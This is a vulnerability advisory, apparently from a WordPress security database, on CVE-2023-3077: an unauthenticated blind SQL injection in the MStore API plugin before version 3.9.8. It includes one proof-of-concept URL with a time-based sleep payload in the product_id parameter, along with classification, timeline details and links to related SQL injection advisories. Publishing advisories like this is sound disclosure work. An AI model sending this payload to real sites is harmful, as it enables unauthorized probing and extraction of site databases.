MStore API < 3.9.8 – Unauthenticated Blind SQLi | CVE 2023-3077

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a Blind SQL injection exploitable by unauthenticated users. This is only exploitable if the site owner elected to pay to get access to the plugins' pro features, and uses the woocommerce-appointments plugin.

Proof of Concept

https://vulnerable-site.tld/wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(10)--+-

Affects Plugins

mstore-api

Fixed in 3.9.8

References

CVE

CVE-2023-3077

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

8.6 (high)

Miscellaneous

Original Researcher

Truoc Phan

Submitter

Truoc Phan

Submitter website

https://www.facebook.com/292706121240740

Submitter twitter

truocphan

Verified

Yes

WPVDB ID

9480d0b5-97da-467d-98f6-71a32599a432

Timeline

Publicly Published

2023-06-19 (about 2 years ago)

Added

2023-06-19 (about 2 years ago)

Last Updated

2023-06-19 (about 2 years ago)

Other

Published

Title

Published

2022-12-05

Title

Contest Gallery < 19.1.5 - Author+ SQL Injection

Published

2025-01-07

Title

Emailing Subscription <= 1.4.1 - Unauthenticated SQL Injection

Published

2025-02-17

Title

Simple Signup Form <= 1.6.5 - Authenticated (Contributor+) SQL Injection

Published

2025-05-06

Title

PGS Core < 5.9.0 - Unauthenticated SQL Injection

Published

2016-06-10

Title

Search Everything < 8.1.6 - SQL Injection